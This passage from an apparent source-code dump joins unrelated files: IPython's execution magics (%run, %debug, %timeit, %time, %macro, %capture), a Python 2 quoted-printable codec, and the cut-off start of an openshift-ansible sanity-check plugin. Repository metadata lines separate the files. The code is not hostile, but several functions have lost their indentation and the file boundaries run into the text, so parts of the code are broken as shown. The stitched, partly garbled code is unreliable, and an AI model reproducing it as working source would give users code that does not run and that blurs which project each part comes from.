        args = magic_arguments.parse_argstring(self.debug, line)
        if not (args.breakpoint or args.statement or cell):
            # No arguments at all -> post-mortem on the last traceback.
            self._debug_post_mortem()
        else:
            # Join the line statement(s) with the cell body (if any) and
            # execute them under the debugger.
            code = "\n".join(args.statement)
            if cell:
                code += "\n" + cell
            self._debug_exec(code, args.breakpoint)
    def _debug_post_mortem(self):
        # Drop into the debugger on the most recent traceback.
        self.shell.debugger(force=True)
def _debug_exec(self, code, breakpoint):
if breakpoint:
(filename, bp_line) = breakpoint.rsplit(':', 1)
bp_line = int(bp_line)
else:
(filename, bp_line) = (None, None)
self._run_with_debugger(code, self.shell.user_ns, filename, bp_line)
    @line_magic
    def tb(self, s):
        """Print the last traceback with the currently active exception mode.
        See %xmode for changing exception reporting modes."""
        # The *s* argument is required by the line-magic API but unused here.
        self.shell.showtraceback()
@skip_doctest
@line_magic
def run(self, parameter_s='', runner=None,
        file_finder=get_py_filename):
    """Run the named file inside IPython as a program.

    Usage::

      %run [-n -i -e -G]
           [( -t [-N<N>] | -d [-b<N>] | -p [profile options] )]
           ( -m mod | file ) [args]

    Parameters after the filename are passed as command-line arguments to
    the program (put in sys.argv). Then, control returns to IPython's
    prompt.

    This is similar to running at a system prompt ``python file args``,
    but with the advantage of giving you IPython's tracebacks, and of
    loading all variables into your interactive namespace for further use
    (unless -p is used, see below).

    The file is executed in a namespace initially consisting only of
    ``__name__=='__main__'`` and sys.argv constructed as indicated. It thus
    sees its environment as if it were being run as a stand-alone program
    (except for sharing global objects such as previously imported
    modules). But after execution, the IPython interactive namespace gets
    updated with all variables defined in the program (except for __name__
    and sys.argv). This allows for very convenient loading of code for
    interactive work, while giving each program a 'clean sheet' to run in.

    Arguments are expanded using shell-like glob match.  Patterns
    '*', '?', '[seq]' and '[!seq]' can be used.  Additionally,
    tilde '~' will be expanded into user's home directory.  Unlike
    real shells, quotation does not suppress expansions.  Use
    *two* back slashes (e.g. ``\\\\*``) to suppress expansions.
    To completely disable these expansions, you can use -G flag.

    Options:

    -n
      __name__ is NOT set to '__main__', but to the running file's name
      without extension (as python does under import).  This allows running
      scripts and reloading the definitions in them without calling code
      protected by an ``if __name__ == "__main__"`` clause.

    -i
      run the file in IPython's namespace instead of an empty one. This
      is useful if you are experimenting with code written in a text editor
      which depends on variables defined interactively.

    -e
      ignore sys.exit() calls or SystemExit exceptions in the script
      being run.  This is particularly useful if IPython is being used to
      run unittests, which always exit with a sys.exit() call.  In such
      cases you are interested in the output of the test results, not in
      seeing a traceback of the unittest module.

    -t
      print timing information at the end of the run.  IPython will give
      you an estimated CPU time consumption for your script, which under
      Unix uses the resource module to avoid the wraparound problems of
      time.clock().  Under Unix, an estimate of time spent on system tasks
      is also given (for Windows platforms this is reported as 0.0).

    If -t is given, an additional ``-N<N>`` option can be given, where <N>
    must be an integer indicating how many times you want the script to
    run.  The final timing report will include total and per run results.

    For example (testing the script uniq_stable.py)::

        In [1]: run -t uniq_stable

        IPython CPU timings (estimated):
          User   : 0.19597 s.
          System : 0.0 s.

        In [2]: run -t -N5 uniq_stable

        IPython CPU timings (estimated):
        Total runs performed: 5
          Times  :      Total       Per run
          User   :   0.910862 s,  0.1821724 s.
          System :   0.0 s,       0.0 s.

    -d
      run your program under the control of pdb, the Python debugger.
      This allows you to execute your program step by step, watch variables,
      etc.  Internally, what IPython does is similar to calling::

          pdb.run('execfile("YOURFILENAME")')

      with a breakpoint set on line 1 of your file.  You can change the line
      number for this automatic breakpoint to be <N> by using the -bN option
      (where N must be an integer). For example::

          %run -d -b40 myscript

      will set the first breakpoint at line 40 in myscript.py.  Note that
      the first breakpoint must be set on a line which actually does
      something (not a comment or docstring) for it to stop execution.

      Or you can specify a breakpoint in a different file::

          %run -d -b myotherfile.py:20 myscript

      When the pdb debugger starts, you will see a (Pdb) prompt.  You must
      first enter 'c' (without quotes) to start execution up to the first
      breakpoint.

      Entering 'help' gives information about the use of the debugger.  You
      can easily see pdb's full documentation with "import pdb;pdb.help()"
      at a prompt.

    -p
      run program under the control of the Python profiler module (which
      prints a detailed report of execution times, function calls, etc).

      You can pass other options after -p which affect the behavior of the
      profiler itself. See the docs for %prun for details.

      In this mode, the program's variables do NOT propagate back to the
      IPython interactive namespace (because they remain in the namespace
      where the profiler executes them).

      Internally this triggers a call to %prun, see its documentation for
      details on the options available specifically for profiling.

    There is one special usage for which the text above doesn't apply:
    if the filename ends with .ipy[nb], the file is run as ipython script,
    just as if the commands were written on IPython prompt.

    -m
      specify module name to load instead of script path. Similar to
      the -m option for the python interpreter. Use this option last if you
      want to combine with other %run options. Unlike the python interpreter
      only source modules are allowed no .pyc or .pyo files.
      For example::

          %run -m example

      will run the example module.

    -G
      disable shell-like glob expansion of arguments.

    """
    # --- Phase 1: parse options and resolve the target file. ---
    # get arguments and set sys.argv for program to be run.
    opts, arg_lst = self.parse_options(parameter_s,
                                       'nidtN:b:pD:l:rs:T:em:G',
                                       mode='list', list_all=1)
    if "m" in opts:
        # -m: resolve the module name to its source file path so the
        # rest of the machinery can treat it like a plain file.
        modulename = opts["m"][0]
        modpath = find_mod(modulename)
        if modpath is None:
            warn('%r is not a valid modulename on sys.path'%modulename)
            return
        arg_lst = [modpath] + arg_lst
    try:
        filename = file_finder(arg_lst[0])
    except IndexError:
        warn('you must provide at least a filename.')
        print('\n%run:\n', oinspect.getdoc(self.run))
        return
    except IOError as e:
        try:
            msg = str(e)
        except UnicodeError:
            msg = e.message
        error(msg)
        return
    if filename.lower().endswith(('.ipy', '.ipynb')):
        # IPython-syntax files take a completely separate execution path.
        with preserve_keys(self.shell.user_ns, '__file__'):
            self.shell.user_ns['__file__'] = filename
            self.shell.safe_execfile_ipy(filename)
        return
    # Control the response to exit() calls made by the script being run
    exit_ignore = 'e' in opts
    # --- Phase 2: build sys.argv for the program. ---
    # Make sure that the running script gets a proper sys.argv as if it
    # were run from a system shell.
    save_argv = sys.argv  # save it for later restoring
    if 'G' in opts:
        args = arg_lst[1:]
    else:
        # tilde and glob expansion
        args = shellglob(map(os.path.expanduser, arg_lst[1:]))
    sys.argv = [filename] + args  # put in the proper filename
    # protect sys.argv from potential unicode strings on Python 2:
    if not py3compat.PY3:
        sys.argv = [ py3compat.cast_bytes(a) for a in sys.argv ]
    # --- Phase 3: choose the namespace the program runs in. ---
    if 'i' in opts:
        # Run in user's interactive namespace
        prog_ns = self.shell.user_ns
        __name__save = self.shell.user_ns['__name__']
        prog_ns['__name__'] = '__main__'
        main_mod = self.shell.user_module
        # Since '%run foo' emulates 'python foo.py' at the cmd line, we must
        # set the __file__ global in the script's namespace
        # TK: Is this necessary in interactive mode?
        prog_ns['__file__'] = filename
    else:
        # Run in a fresh, empty namespace
        if 'n' in opts:
            name = os.path.splitext(os.path.basename(filename))[0]
        else:
            name = '__main__'
        # The shell MUST hold a reference to prog_ns so after %run
        # exits, the python deletion mechanism doesn't zero it out
        # (leaving dangling references). See interactiveshell for details
        main_mod = self.shell.new_main_mod(filename, name)
        prog_ns = main_mod.__dict__
    # pickle fix.  See interactiveshell for an explanation.  But we need to
    # make sure that, if we overwrite __main__, we replace it at the end
    main_mod_name = prog_ns['__name__']
    if main_mod_name == '__main__':
        restore_main = sys.modules['__main__']
    else:
        restore_main = False
    # This needs to be undone at the end to prevent holding references to
    # every single object ever created.
    sys.modules[main_mod_name] = main_mod
    # --- Phase 4: build the code string for profiler/debugger modes. ---
    if 'p' in opts or 'd' in opts:
        if 'm' in opts:
            code = 'run_module(modulename, prog_ns)'
            code_ns = {
                'run_module': self.shell.safe_run_module,
                'prog_ns': prog_ns,
                'modulename': modulename,
            }
        else:
            if 'd' in opts:
                # allow exceptions to raise in debug mode
                code = 'execfile(filename, prog_ns, raise_exceptions=True)'
            else:
                code = 'execfile(filename, prog_ns)'
            code_ns = {
                'execfile': self.shell.safe_execfile,
                'prog_ns': prog_ns,
                'filename': get_py_filename(filename),
            }
    # --- Phase 5: execute, then restore global state in `finally`. ---
    try:
        stats = None
        if 'p' in opts:
            stats = self._run_with_profiler(code, opts, code_ns)
        else:
            if 'd' in opts:
                bp_file, bp_line = parse_breakpoint(
                    opts.get('b', ['1'])[0], filename)
                self._run_with_debugger(
                    code, code_ns, filename, bp_line, bp_file)
            else:
                if 'm' in opts:
                    def run():
                        self.shell.safe_run_module(modulename, prog_ns)
                else:
                    if runner is None:
                        runner = self.default_runner
                    if runner is None:
                        runner = self.shell.safe_execfile

                    def run():
                        runner(filename, prog_ns, prog_ns,
                                exit_ignore=exit_ignore)

                if 't' in opts:
                    # timed execution
                    try:
                        nruns = int(opts['N'][0])
                        if nruns < 1:
                            error('Number of runs must be >=1')
                            return
                    except (KeyError):
                        nruns = 1
                    self._run_with_timing(run, nruns)
                else:
                    # regular execution
                    run()

            if 'i' in opts:
                self.shell.user_ns['__name__'] = __name__save
            else:
                # update IPython interactive namespace

                # Some forms of read errors on the file may mean the
                # __name__ key was never set; using pop we don't have to
                # worry about a possible KeyError.
                prog_ns.pop('__name__', None)

                with preserve_keys(self.shell.user_ns, '__file__'):
                    self.shell.user_ns.update(prog_ns)
    finally:
        # It's a bit of a mystery why, but __builtins__ can change from
        # being a module to becoming a dict missing some key data after
        # %run.  As best I can see, this is NOT something IPython is doing
        # at all, and similar problems have been reported before:
        # http://coding.derkeiler.com/Archive/Python/comp.lang.python/2004-10/0188.html
        # Since this seems to be done by the interpreter itself, the best
        # we can do is to at least restore __builtins__ for the user on
        # exit.
        self.shell.user_ns['__builtins__'] = builtin_mod

        # Ensure key global structures are restored
        sys.argv = save_argv
        if restore_main:
            sys.modules['__main__'] = restore_main
        else:
            # Remove from sys.modules the reference to main_mod we'd
            # added.  Otherwise it will trap references to objects
            # contained therein.
            del sys.modules[main_mod_name]

    return stats
def _run_with_debugger(self, code, code_ns, filename=None,
                       bp_line=None, bp_file=None):
    """
    Run `code` in debugger with a break point.

    Parameters
    ----------
    code : str
        Code to execute.
    code_ns : dict
        A namespace in which `code` is executed.
    filename : str
        `code` is ran as if it is in `filename`.
    bp_line : int, optional
        Line number of the break point.
    bp_file : str, optional
        Path to the file in which break point is specified.
        `filename` is used if not given.

    Raises
    ------
    UsageError
        If the break point given by `bp_line` is not valid.
    """
    # Reuse the traceback handler's pdb instance, creating it lazily.
    deb = self.shell.InteractiveTB.pdb
    if not deb:
        self.shell.InteractiveTB.pdb = self.shell.InteractiveTB.debugger_cls()
        deb = self.shell.InteractiveTB.pdb
    # deb.checkline() fails if deb.curframe exists but is None; it can
    # handle it not existing. https://github.com/ipython/ipython/issues/10028
    if hasattr(deb, 'curframe'):
        del deb.curframe
    # reset Breakpoint state, which is moronically kept
    # in a class
    bdb.Breakpoint.next = 1
    bdb.Breakpoint.bplist = {}
    bdb.Breakpoint.bpbynumber = [None]
    if bp_line is not None:
        # Set an initial breakpoint to stop execution
        maxtries = 10
        bp_file = bp_file or filename
        checkline = deb.checkline(bp_file, bp_line)
        if not checkline:
            # The requested line cannot hold a breakpoint (comment or
            # docstring); scan forward up to `maxtries` lines for one
            # that can, and give up with a UsageError otherwise.
            for bp in range(bp_line + 1, bp_line + maxtries + 1):
                if deb.checkline(bp_file, bp):
                    break
            else:
                msg = ("\nI failed to find a valid line to set "
                       "a breakpoint\n"
                       "after trying up to line: %s.\n"
                       "Please set a valid breakpoint manually "
                       "with the -b option." % bp)
                raise UsageError(msg)
        # if we find a good linenumber, set the breakpoint
        deb.do_break('%s:%s' % (bp_file, bp_line))
    if filename:
        # Mimic Pdb._runscript(...)
        deb._wait_for_mainpyfile = True
        deb.mainpyfile = deb.canonic(filename)
    # Start file run
    print("NOTE: Enter 'c' at the %s prompt to continue execution." % deb.prompt)
    try:
        if filename:
            # save filename so it can be used by methods on the deb object
            deb._exec_filename = filename
        while True:
            try:
                deb.run(code, code_ns)
            except Restart:
                # pdb's `restart` command: re-arm the mainpyfile wait and
                # run the code again from the top.
                print("Restarting")
                if filename:
                    deb._wait_for_mainpyfile = True
                    deb.mainpyfile = deb.canonic(filename)
                continue
            else:
                break
    except:
        etype, value, tb = sys.exc_info()
        # Skip three frames in the traceback: the %run one,
        # one inside bdb.py, and the command-line typed by the
        # user (run by exec in pdb itself).
        self.shell.InteractiveTB(etype, value, tb, tb_offset=3)
@staticmethod
def _run_with_timing(run, nruns):
    """
    Run function `run` and print timing information.

    Parameters
    ----------
    run : callable
        Any callable object which takes no argument.
    nruns : int
        Number of times to execute `run`.
    """
    # Wall-clock time covers the whole batch, including loop overhead.
    twall0 = time.time()
    if nruns == 1:
        t0 = clock2()
        run()
        t1 = clock2()
        # clock2() returns a (user, system) pair — report each delta.
        t_usr = t1[0] - t0[0]
        t_sys = t1[1] - t0[1]
        print("\nIPython CPU timings (estimated):")
        print("  User   : %10.2f s." % t_usr)
        print("  System : %10.2f s." % t_sys)
    else:
        runs = range(nruns)
        t0 = clock2()
        for nr in runs:
            run()
        t1 = clock2()
        t_usr = t1[0] - t0[0]
        t_sys = t1[1] - t0[1]
        print("\nIPython CPU timings (estimated):")
        print("Total runs performed:", nruns)
        print("  Times  : %10s    %10s" % ('Total', 'Per run'))
        print("  User   : %10.2f s, %10.2f s." % (t_usr, t_usr / nruns))
        print("  System : %10.2f s, %10.2f s." % (t_sys, t_sys / nruns))
    twall1 = time.time()
    print("Wall time: %10.2f s." % (twall1 - twall0))
@skip_doctest
@line_cell_magic
def timeit(self, line='', cell=None):
    """Time execution of a Python statement or expression

    Usage, in line mode:
      %timeit [-n<N> -r<R> [-t|-c] -q -p<P> -o] statement
    or in cell mode:
      %%timeit [-n<N> -r<R> [-t|-c] -q -p<P> -o] setup_code
      code
      code...

    Time execution of a Python statement or expression using the timeit
    module.  This function can be used both as a line and cell magic:

    - In line mode you can time a single-line statement (though multiple
      ones can be chained with using semicolons).

    - In cell mode, the statement in the first line is used as setup code
      (executed but not timed) and the body of the cell is timed.  The cell
      body has access to any variables created in the setup code.

    Options:

    -n<N>: execute the given statement <N> times in a loop. If this value
    is not given, a fitting value is chosen.

    -r<R>: repeat the loop iteration <R> times and take the best result.
    Default: 3

    -t: use time.time to measure the time, which is the default on Unix.
    This function measures wall time.

    -c: use time.clock to measure the time, which is the default on
    Windows and measures wall time. On Unix, resource.getrusage is used
    instead and returns the CPU user time.

    -p<P>: use a precision of <P> digits to display the timing result.
    Default: 3

    -q: Quiet, do not print result.

    -o: return a TimeitResult that can be stored in a variable to inspect
        the result in more details.

    Examples
    --------
    ::

      In [1]: %timeit pass
      10000000 loops, best of 3: 53.3 ns per loop

      In [2]: u = None

      In [3]: %timeit u is None
      10000000 loops, best of 3: 184 ns per loop

      In [4]: %timeit -r 4 u == None
      1000000 loops, best of 4: 242 ns per loop

      In [5]: import time

      In [6]: %timeit -n1 time.sleep(2)
      1 loop, best of 3: 2 s per loop

    The times reported by %timeit will be slightly higher than those
    reported by the timeit.py script when variables are accessed. This is
    due to the fact that %timeit executes the statement in the namespace
    of the shell, compared with timeit.py, which uses a single setup
    statement to import function or create variables. Generally, the bias
    does not matter as long as results from timeit.py are not mixed with
    those from %timeit."""
    # Parse options; strict=False lets unknown flags pass through to the
    # timed statement itself.
    opts, stmt = self.parse_options(line,'n:r:tcp:qo',
                                    posix=False, strict=False)
    if stmt == "" and cell is None:
        return

    timefunc = timeit.default_timer
    # number == 0 means "auto-determine the loop count" below.
    number = int(getattr(opts, "n", 0))
    repeat = int(getattr(opts, "r", timeit.default_repeat))
    precision = int(getattr(opts, "p", 3))
    quiet = 'q' in opts
    return_result = 'o' in opts
    if hasattr(opts, "t"):
        timefunc = time.time
    if hasattr(opts, "c"):
        timefunc = clock

    timer = Timer(timer=timefunc)
    # this code has tight coupling to the inner workings of timeit.Timer,
    # but is there a better way to achieve that the code stmt has access
    # to the shell namespace?
    transform = self.shell.input_splitter.transform_cell

    if cell is None:
        # called as line magic
        ast_setup = self.shell.compile.ast_parse("pass")
        ast_stmt = self.shell.compile.ast_parse(transform(stmt))
    else:
        # cell magic: first line is setup (untimed), body is timed
        ast_setup = self.shell.compile.ast_parse(transform(stmt))
        ast_stmt = self.shell.compile.ast_parse(transform(cell))

    ast_setup = self.shell.transform_ast(ast_setup)
    ast_stmt = self.shell.transform_ast(ast_stmt)

    # This codestring is taken from timeit.template - we fill it in as an
    # AST, so that we can apply our AST transformations to the user code
    # without affecting the timing code.
    timeit_ast_template = ast.parse('def inner(_it, _timer):\n'
                                    '    setup\n'
                                    '    _t0 = _timer()\n'
                                    '    for _i in _it:\n'
                                    '        stmt\n'
                                    '    _t1 = _timer()\n'
                                    '    return _t1 - _t0\n')

    timeit_ast = TimeitTemplateFiller(ast_setup, ast_stmt).visit(timeit_ast_template)
    timeit_ast = ast.fix_missing_locations(timeit_ast)

    # Track compilation time so it can be reported if too long
    # Minimum time above which compilation time will be reported
    tc_min = 0.1

    t0 = clock()
    code = self.shell.compile(timeit_ast, "<magic-timeit>", "exec")
    tc = clock()-t0

    ns = {}
    # Run the generated module body to obtain the `inner` timing function.
    exec(code, self.shell.user_ns, ns)
    timer.inner = ns["inner"]

    # This is used to check if there is a huge difference between the
    # best and worst timings.
    # Issue: https://github.com/ipython/ipython/issues/6471
    worst_tuning = 0
    if number == 0:
        # determine number so that 0.2 <= total time < 2.0
        number = 1
        for _ in range(1, 10):
            time_number = timer.timeit(number)
            worst_tuning = max(worst_tuning, time_number / number)
            if time_number >= 0.2:
                break
            number *= 10
    all_runs = timer.repeat(repeat, number)
    best = min(all_runs) / number

    worst = max(all_runs) / number
    if worst_tuning:
        worst = max(worst, worst_tuning)

    if not quiet :
        # Check best timing is greater than zero to avoid a
        # ZeroDivisionError.
        # In cases where the slowest timing is lesser than a micosecond
        # we assume that it does not really matter if the fastest
        # timing is 4 times faster than the slowest timing or not.
        if worst > 4 * best and best > 0 and worst > 1e-6:
            print("The slowest run took %0.2f times longer than the "
                  "fastest. This could mean that an intermediate result "
                  "is being cached." % (worst / best))
        if number == 1:  # No s at "loops" if only one loop
            print(u"%d loop, best of %d: %s per loop" % (number, repeat,
                                                         _format_time(best, precision)))
        else:
            print(u"%d loops, best of %d: %s per loop" % (number, repeat,
                                                          _format_time(best, precision)))
        if tc > tc_min:
            print("Compiler time: %.2f s" % tc)
    if return_result:
        return TimeitResult(number, repeat, best, worst, all_runs, tc, precision)
@skip_doctest
@needs_local_scope
@line_cell_magic
def time(self,line='', cell=None, local_ns=None):
    """Time execution of a Python statement or expression.

    The CPU and wall clock times are printed, and the value of the
    expression (if any) is returned.  Note that under Win32, system time
    is always reported as 0, since it can not be measured.

    This function can be used both as a line and cell magic:

    - In line mode you can time a single-line statement (though multiple
      ones can be chained with using semicolons).

    - In cell mode, you can time the cell body (a directly
      following statement raises an error).

    This function provides very basic timing functionality.  Use the timeit
    magic for more control over the measurement.

    Examples
    --------
    ::

      In [1]: %time 2**128
      CPU times: user 0.00 s, sys: 0.00 s, total: 0.00 s
      Wall time: 0.00
      Out[1]: 340282366920938463463374607431768211456L

      In [2]: n = 1000000

      In [3]: %time sum(range(n))
      CPU times: user 1.20 s, sys: 0.05 s, total: 1.25 s
      Wall time: 1.37
      Out[3]: 499999500000L

      In [4]: %time print 'hello world'
      hello world
      CPU times: user 0.00 s, sys: 0.00 s, total: 0.00 s
      Wall time: 0.00

      Note that the time needed by Python to compile the given expression
      will be reported if it is more than 0.1s.  In this example, the
      actual exponentiation is done by Python at compilation time, so while
      the expression can take a noticeable amount of time to compute, that
      time is purely due to the compilation:

      In [5]: %time 3**9999;
      CPU times: user 0.00 s, sys: 0.00 s, total: 0.00 s
      Wall time: 0.00 s

      In [6]: %time 3**999999;
      CPU times: user 0.00 s, sys: 0.00 s, total: 0.00 s
      Wall time: 0.00 s
      Compiler : 0.78 s
    """
    # fail immediately if the given expression can't be compiled
    if line and cell:
        raise UsageError("Can't use statement directly after '%%time'!")

    if cell:
        expr = self.shell.input_transformer_manager.transform_cell(cell)
    else:
        expr = self.shell.input_transformer_manager.transform_cell(line)

    # Minimum time above which parse time will be reported
    tp_min = 0.1

    t0 = clock()
    expr_ast = self.shell.compile.ast_parse(expr)
    tp = clock()-t0

    # Apply AST transformations
    expr_ast = self.shell.transform_ast(expr_ast)

    # Minimum time above which compilation time will be reported
    tc_min = 0.1

    # A single expression is eval'd so its value can be returned;
    # anything else must go through exec and returns None.
    if len(expr_ast.body)==1 and isinstance(expr_ast.body[0], ast.Expr):
        mode = 'eval'
        source = '<timed eval>'
        expr_ast = ast.Expression(expr_ast.body[0].value)
    else:
        mode = 'exec'
        source = '<timed exec>'
    t0 = clock()
    code = self.shell.compile(expr_ast, source, mode)
    tc = clock()-t0

    # skew measurement as little as possible
    glob = self.shell.user_ns
    wtime = time.time
    # time execution
    wall_st = wtime()
    if mode=='eval':
        st = clock2()
        out = eval(code, glob, local_ns)
        end = clock2()
    else:
        st = clock2()
        exec(code, glob, local_ns)
        end = clock2()
        out = None
    wall_end = wtime()
    # Compute actual times and report
    wall_time = wall_end-wall_st
    cpu_user = end[0]-st[0]
    cpu_sys = end[1]-st[1]
    cpu_tot = cpu_user+cpu_sys
    # On windows cpu_sys is always zero, so no new information to the next print
    if sys.platform != 'win32':
        print("CPU times: user %s, sys: %s, total: %s" % \
              (_format_time(cpu_user),_format_time(cpu_sys),_format_time(cpu_tot)))
    print("Wall time: %s" % _format_time(wall_time))
    if tc > tc_min:
        print("Compiler : %s" % _format_time(tc))
    if tp > tp_min:
        print("Parser   : %s" % _format_time(tp))
    return out
@skip_doctest
@line_magic
def macro(self, parameter_s=''):
    """Define a macro for future re-execution. It accepts ranges of history,
    filenames or string objects.

    Usage:\\
      %macro [options] name n1-n2 n3-n4 ... n5 .. n6 ...

    Options:

      -r: use 'raw' input. By default, the 'processed' history is used,
      so that magics are loaded in their transformed version to valid
      Python. If this option is given, the raw input as typed at the
      command line is used instead.

      -q: quiet macro definition. By default, a tag line is printed
      to indicate the macro has been created, and then the contents of
      the macro are printed. If this option is given, then no printout
      is produced once the macro is created.

    This will define a global variable called `name` which is a string
    made of joining the slices and lines you specify (n1,n2,... numbers
    above) from your input history into a single string. This variable
    acts like an automatic function which re-executes those lines as if
    you had typed them. You just type 'name' at the prompt and the code
    executes.

    The syntax for indicating input ranges is described in %history.

    Note: as a 'hidden' feature, you can also use traditional python slice
    notation, where N:M means numbers N through M-1.

    For example, if your history contains (print using %hist -n )::

      44: x=1
      45: y=3
      46: z=x+y
      47: print x
      48: a=5
      49: print 'x',x,'y',y

    you can create a macro with lines 44 through 47 (included) and line 49
    called my_macro with::

      In [55]: %macro my_macro 44-47 49

    Now, typing `my_macro` (without quotes) will re-execute all this code
    in one pass.

    You don't need to give the line-numbers in order, and any given line
    number can appear multiple times. You can assemble macros with any
    lines from your input history in any order.

    The macro is a simple object which holds its value in an attribute,
    but IPython's display system checks for macros and executes them as
    code instead of printing them when you type their name.

    You can view a macro's contents by explicitly printing it with::

      print macro_name

    """
    opts, args = self.parse_options(parameter_s, 'rq', mode='list')
    if not args:
        # Called without arguments: list the names of existing macros.
        existing = (k for k, v in iteritems(self.shell.user_ns)
                    if isinstance(v, Macro))
        return sorted(existing)
    if len(args) == 1:
        raise UsageError(
            "%macro insufficient args; usage '%macro name n1-n2 n3-4...")
    name = args[0]
    codefrom = " ".join(args[1:])
    try:
        # -r selects the raw (untransformed) history.
        lines = self.shell.find_user_code(codefrom, 'r' in opts)
    except (ValueError, TypeError) as e:
        print(e.args[0])
        return
    macro = Macro(lines)
    self.shell.define_macro(name, macro)
    if 'q' not in opts:
        print('Macro `%s` created. To execute, type its name (without quotes).' % name)
        print('=== Macro contents: ===')
        print(macro, end=' ')
@magic_arguments.magic_arguments()
@magic_arguments.argument('output', type=str, default='', nargs='?',
    help="""The name of the variable in which to store output.
    This is a utils.io.CapturedIO object with stdout/err attributes
    for the text of the captured output.
    CapturedOutput also has a show() method for displaying the output,
    and __call__ as well, so you can use that to quickly display the
    output.
    If unspecified, captured output is discarded.
    """
)
@magic_arguments.argument('--no-stderr', action="store_true",
    help="""Don't capture stderr."""
)
@magic_arguments.argument('--no-stdout', action="store_true",
    help="""Don't capture stdout."""
)
@magic_arguments.argument('--no-display', action="store_true",
    help="""Don't capture IPython's rich display."""
)
@cell_magic
def capture(self, line, cell):
    """run the cell, capturing stdout, stderr, and IPython's rich display() calls."""
    args = magic_arguments.parse_argstring(self.capture, line)
    # Each --no-* flag disables one capture channel.
    grab_stdout = not args.no_stdout
    grab_stderr = not args.no_stderr
    grab_display = not args.no_display
    with capture_output(grab_stdout, grab_stderr, grab_display) as io:
        self.shell.run_cell(cell)
    if args.output:
        # Expose the captured IO object under the requested variable name.
        self.shell.user_ns[args.output] = io
def parse_breakpoint(text, current_file):
    '''Returns (file, line) for file:line and (current_file, line) for line.

    The separator is the *last* colon, so file names that themselves
    contain a colon (e.g. Windows drive paths like ``C:\\script.py:20``)
    parse correctly.  This also matches how %debug's -b argument is
    split (``_debug_exec`` uses ``rsplit(':', 1)``).
    '''
    if ':' not in text:
        # Bare line number: break in the file currently being run.
        return current_file, int(text)
    # FIX: previously this split on the *first* colon (text.find(':')),
    # which raised ValueError for paths such as "C:\\script.py:20".
    filename, lineno = text.rsplit(':', 1)
    return filename, int(lineno)
def _format_time(timespan, precision=3):
"""Formats the timespan in a human readable form"""
import math
if timespan >= 60.0:
# we have more than a minute, format that in a human readable form
# Idea from http://snipplr.com/view/5713/
parts = [("d", 60*60*24),("h", 60*60),("min", 60), ("s", 1)]
time = []
leftover = timespan
for suffix, length in parts:
value = int(leftover / length)
if value > 0:
leftover = leftover % length
time.append(u'%s%s' % (str(value), suffix))
if leftover < 1:
break
return " ".join(time)
# Unfortunately the unicode 'micro' symbol can cause problems in
# certain terminals.
# See bug: https://bugs.launchpad.net/ipython/+bug/348466
# Try to prevent crashes by being more secure than it needs to
# E.g. eclipse is able to print a µ, but has no sys.stdout.encoding set.
units = [u"s", u"ms",u'us',"ns"] # the save value
if hasattr(sys.stdout, 'encoding') and sys.stdout.encoding:
try:
u'\xb5'.encode(sys.stdout.encoding)
units = [u"s", u"ms",u'\xb5s',"ns"]
except:
pass
scaling = [1, 1e3, 1e6, 1e9]
if timespan > 0.0:
order = min(-int(math.floor(math.log10(timespan)) // 3), 3)
else:
order = 3
return u"%.*g %s" % (precision, timespan * scaling[order], units[order])
| apache-2.0 |
denfromufa/PTVS | Python/Tests/TestData/VirtualEnv/env/Lib/encodings/quopri_codec.py | 87 | 2222 | """Codec for quoted-printable encoding.
Like base64 and rot13, this returns Python strings, not Unicode.
"""
import codecs, quopri
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
def quopri_encode(input, errors='strict'):
    """Encode the input, returning a tuple (output object, length consumed).

    errors defines the error handling to apply. It defaults to
    'strict' handling which is the only currently supported
    error handling for this codec.
    """
    assert errors == 'strict'
    # str() guards against cStringIO's undesired behavior on Unicode input.
    source = StringIO(str(input))
    sink = StringIO()
    # The third argument enables quoting of tab/space characters.
    quopri.encode(source, sink, 1)
    return (sink.getvalue(), len(input))
def quopri_decode(input, errors='strict'):
    """Decode the input, returning a tuple (output object, length consumed).

    errors defines the error handling to apply. It defaults to
    'strict' handling which is the only currently supported
    error handling for this codec.
    """
    assert errors == 'strict'
    # str() guards against cStringIO's undesired behavior on Unicode input.
    source = StringIO(str(input))
    sink = StringIO()
    quopri.decode(source, sink)
    return (sink.getvalue(), len(input))
class Codec(codecs.Codec):
    """Stateless codec object; delegates to the module-level helpers."""

    def encode(self, input, errors='strict'):
        return quopri_encode(input, errors)

    def decode(self, input, errors='strict'):
        return quopri_decode(input, errors)
class IncrementalEncoder(codecs.IncrementalEncoder):
    """Incremental encoder; each chunk is encoded independently (no state
    is carried between calls)."""

    def encode(self, input, final=False):
        # [0] drops the length-consumed element of the (output, length) pair.
        return quopri_encode(input, self.errors)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
    """Incremental decoder; each chunk is decoded independently (no state
    is carried between calls)."""

    def decode(self, input, final=False):
        # [0] drops the length-consumed element of the (output, length) pair.
        return quopri_decode(input, self.errors)[0]
class StreamWriter(Codec, codecs.StreamWriter):
    # All behavior is inherited from Codec and codecs.StreamWriter.
    pass
class StreamReader(Codec, codecs.StreamReader):
    # All behavior is inherited from Codec and codecs.StreamReader.
    pass
# encodings module API
def getregentry():
    """Return the CodecInfo record used to register the 'quopri' codec."""
    return codecs.CodecInfo(
        name='quopri',
        encode=quopri_encode,
        decode=quopri_decode,
        incrementalencoder=IncrementalEncoder,
        incrementaldecoder=IncrementalDecoder,
        streamwriter=StreamWriter,
        streamreader=StreamReader,
    )
| apache-2.0 |
twiest/openshift-tools | openshift/installer/vendored/openshift-ansible-3.8.36-1/roles/lib_utils/action_plugins/sanity_checks.py | 4 | 8160 | """
Ansible action plugin to ensure inventory variables are set
appropriately and no conflicting options have been provided.
"""
import re
from ansible.plugins.action import ActionBase
from ansible import errors
# Valid values for openshift_deployment_type
VALID_DEPLOYMENT_TYPES = ('origin', 'openshift-enterprise')

# Tuple of variable names and default values if undefined.
NET_PLUGIN_LIST = (('openshift_use_openshift_sdn', True),
                   ('openshift_use_flannel', False),
                   ('openshift_use_nuage', False),
                   ('openshift_use_contiv', False),
                   ('openshift_use_calico', False))

# User-facing messages for malformed openshift_image_tag values; the {}
# placeholder is filled with the offending tag via str.format().
ENTERPRISE_TAG_REGEX_ERROR = """openshift_image_tag must be in the format
v#.#[.#[.#]]. Examples: v1.2, v3.4.1, v3.5.1.3,
v3.5.1.3.4, v1.2-1, v1.2.3-4, v1.2.3-4.5, v1.2.3-4.5.6
You specified openshift_image_tag={}"""

ORIGIN_TAG_REGEX_ERROR = """openshift_image_tag must be in the format
v#.#.#[-optional.#]. Examples: v1.2.3, v3.5.1-alpha.1
